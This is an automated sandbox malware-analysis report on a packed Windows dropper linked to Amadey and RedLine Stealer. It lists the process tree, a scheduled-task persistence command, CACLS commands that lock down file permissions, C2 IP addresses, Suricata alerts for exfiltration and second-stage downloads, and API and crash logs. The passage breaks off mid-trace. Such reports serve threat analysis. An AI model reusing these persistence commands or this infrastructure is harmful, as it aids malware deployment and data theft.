Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 2, 2023, 4:56 p.m.	Aug. 2, 2023, 5:07 p.m.

Size	6.5MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`89e9bc7a5d97370a0f4a35041a54a696`
SHA256	`9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847`
CRC32	`138AEDE0`
ssdeep	`196608:3PbBDSjGzSuyKff2j6pdVY3d2dZo2tOuAX+W6+B6VJN1lev:3JKGzXuTwdZdLM+JS`
Yara	UPX_Zero - UPX packed file Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsPE32 - (no description)

taskmaskamd.exe "C:\Users\test22\AppData\Local\Temp\taskmaskamd.exe"
2568
- oneetx.exe "C:\Users\test22\AppData\Local\Temp\eb0f58bce7\oneetx.exe"
  2728
  - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\eb0f58bce7\oneetx.exe" /F
    2792
  - cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\eb0f58bce7" /P "test22:N"&&CACLS "..\eb0f58bce7" /P "test22:R" /E&&Exit
    2848
    - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      2920
    - cacls.exe CACLS "oneetx.exe" /P "test22:N"
      2960
    - cacls.exe CACLS "oneetx.exe" /P "test22:R" /E
      3012
    - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      3060
    - cacls.exe CACLS "..\eb0f58bce7" /P "test22:N"
      2056
    - cacls.exe CACLS "..\eb0f58bce7" /P "test22:R" /E
      2120
  - taskmask.exe "C:\Users\test22\AppData\Local\Temp\1000127001\taskmask.exe"
    2212
    - AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      2324
  - rdpcllp.exe "C:\Users\test22\AppData\Local\Temp\1000128101\rdpcllp.exe"
    2932
  - taskhostclp.exe "C:\Users\test22\AppData\Local\Temp\1000129001\taskhostclp.exe"
    3032
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
second.amadgood.com
api.ip.sb	CNAME api.ip.sb.cdn.cloudflare.net A 104.26.13.31 A 104.26.12.31 A 172.67.75.172	104.26.12.31

IP Address	Status	Action
104.26.12.31	Active	Moloch
128.199.192.86	Active	Moloch
164.124.101.2	Active	Moloch
194.180.49.153	Active	Moloch
45.15.156.208	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49172 -> 45.15.156.208:80	2027700	ET MALWARE Amadey CnC Check-In	Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 45.15.156.208:80	2045751	ET MALWARE Win32/Amadey Bot Activity (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49174 -> 194.180.49.153:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 194.180.49.153:80 -> 192.168.56.101:49174	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 194.180.49.153:80 -> 192.168.56.101:49174	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 194.180.49.153:80 -> 192.168.56.101:49174	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 45.15.156.208:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49180 -> 128.199.192.86:81	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 128.199.192.86:81	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 194.180.49.153:80 -> 192.168.56.101:49174	2014819	ET INFO Packed Executable Download	Misc activity
TCP 192.168.56.101:49181 -> 104.26.12.31:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49174 -> 194.180.49.153:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49173 -> 45.15.156.208:80	2044597	ET MALWARE Amadey Bot Activity (POST) M1	A Network Trojan was detected
TCP 192.168.56.101:49183 -> 45.15.156.208:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49184 -> 194.180.49.153:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 194.180.49.153:80 -> 192.168.56.101:49184	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 194.180.49.153:80 -> 192.168.56.101:49184	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 194.180.49.153:80 -> 192.168.56.101:49184	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49183 -> 45.15.156.208:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49181 104.26.12.31:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	53:56:0b:3a:91:49:7f:18:59:87:21:98:d3:7f:98:0b:b4:ae:cb:cc

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 2, 2023, 4:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2023, 4:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2023, 4:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2023, 4:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2023, 4:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2023, 4:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2023, 4:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2023, 4:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2023, 4:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2023, 4:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2023, 4:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2023, 4:57 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 2, 2023, 4:57 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 2, 2023, 4:57 p.m.			0	0
IsDebuggerPresent Aug. 2, 2023, 4:57 p.m.			0	0

Command line console output was observed (50 out of 99 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 2, 2023, 4:57 p.m.	buffer: SUCCESS: The scheduled task "oneetx.exe" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: Y console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: N console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW Aug. 2, 2023, 4:57 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\eb0f58bce7\oneetx.exe console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW Aug. 2, 2023, 4:57 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\eb0f58bce7\oneetx.exe console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Aug. 2, 2023, 4:57 p.m.	buffer: r console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (12 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 2, 2023, 4:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00523cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 2, 2023, 4:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00523cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 2, 2023, 4:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00523d70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 2, 2023, 4:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x07cbccd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 2, 2023, 4:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x07cbcc10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 2, 2023, 4:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x07cbcc10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 2, 2023, 4:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x07cbcc10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 2, 2023, 4:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x07cbcc10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 2, 2023, 4:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x07cbcc10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 2, 2023, 4:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x07cbd010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 2, 2023, 4:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x07cbd010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 2, 2023, 4:57 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x07cbcf90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Tries to locate where the browsers are installed (3 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 2, 2023, 4:56 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.<.<.<.<

One or more processes crashed (50 out of 65552 events)

Time & API	Arguments	Status
__exception__ Aug. 2, 2023, 4:57 p.m.	stacktrace: taskmask+0x11306 @ 0xe41306 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.esp: 3930376 registers.edi: 2785280 registers.eax: 2324 registers.ebp: 3930392 registers.edx: 2130566132 registers.ebx: 512 registers.esi: 15998496 registers.ecx: 2208	1
__exception__ Aug. 2, 2023, 4:57 p.m.	stacktrace: 0xa77ac0 0xa779f5 0xa736da 0xa73386 0xa71b93 0xa71b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72362652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7237264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72372e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724274ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72427610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724b1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724b1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724b1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724b416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a0f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 8b d0 85 c0 75 06 8b 15 2c exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa77b59 registers.esp: 2878716 registers.edi: 38029816 registers.eax: 0 registers.ebp: 2878740 registers.edx: 5239192 registers.ebx: 38029836 registers.esi: 38030636 registers.ecx: 0	1
__exception__ Aug. 2, 2023, 4:57 p.m.	stacktrace: 0xa7f849 0xa7f7c3 0xa7f188 0xa7eb04 0xa781d0 0xa736ff 0xa73386 0xa71b93 0xa71b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72362652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7237264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72372e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724274ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72427610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724b1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724b1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724b1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724b416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a0f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 39 fe ff ff eb 0c e8 74 exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa7fabe registers.esp: 2878204 registers.edi: 41099300 registers.eax: 42466972 registers.ebp: 2878264 registers.edx: 0 registers.ebx: 41103448 registers.esi: 42466972 registers.ecx: 0	1
__exception__ Aug. 2, 2023, 4:57 p.m.	stacktrace: 0xa7f849 0xa7f7e0 0xa7f188 0xa7eb04 0xa781d0 0xa736ff 0xa73386 0xa71b93 0xa71b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72362652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7237264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72372e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724274ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72427610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724b1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724b1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724b1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724b416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a0f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 39 fe ff ff eb 0c e8 74 exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa7fabe registers.esp: 2878204 registers.edi: 41099300 registers.eax: 39648612 registers.ebp: 2878264 registers.edx: 0 registers.ebx: 38776284 registers.esi: 39648612 registers.ecx: 0	1
__exception__ Aug. 2, 2023, 4:57 p.m.	stacktrace: 0xa7f849 0xa7f7e0 0xa7f188 0xa7eb04 0xa781d0 0xa736ff 0xa73386 0xa71b93 0xa71b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72362652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7237264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72372e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724274ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72427610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724b1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724b1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724b1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724b416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a0f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 39 fe ff ff eb 0c e8 74 exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa7fabe registers.esp: 2878204 registers.edi: 38723284 registers.eax: 41078560 registers.ebp: 2878264 registers.edx: 0 registers.ebx: 39858520 registers.esi: 41078560 registers.ecx: 0	1
__exception__ Aug. 2, 2023, 4:57 p.m.	stacktrace: 0x91423b9 0xa7f388 0xa7eb04 0xa781d0 0xa736ff 0xa73386 0xa71b93 0xa71b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72362652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7237264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72372e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724274ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72427610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724b1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724b1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724b1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724b416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a0f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 7f fe ff ff eb 0c e8 2f exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x9142603 registers.esp: 2878220 registers.edi: 38723284 registers.eax: 42513372 registers.ebp: 2878272 registers.edx: 0 registers.ebx: 41293316 registers.esi: 42513372 registers.ecx: 0	1
__exception__ Aug. 2, 2023, 4:57 p.m.	stacktrace: 0x91423b9 0xa7f388 0xa7eb04 0xa781d0 0xa736ff 0xa73386 0xa71b93 0xa71b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72362652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7237264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72372e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724274ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72427610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724b1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724b1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724b1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724b416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a0f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 7f fe ff ff eb 0c e8 2f exception.instruction: mov edx, dword ptr [edx + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x9142603 registers.esp: 2878220 registers.edi: 38723284 registers.eax: 44217788 registers.ebp: 2878272 registers.edx: 0 registers.ebx: 42643016 registers.esi: 44217788 registers.ecx: 0	1
__exception__ Aug. 2, 2023, 4:57 p.m.	stacktrace: 0x91423b9 0xa7f388 0xa7eb04 0xa781d0 0xa736ff 0xa73386 0xa71b93 0xa71b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72362652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7237264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72372e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724274ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72427610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724b1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724b1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724b1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724b416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a0f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 7f fe ff ff eb 0c e8 2f exception.instruction: mov edx, 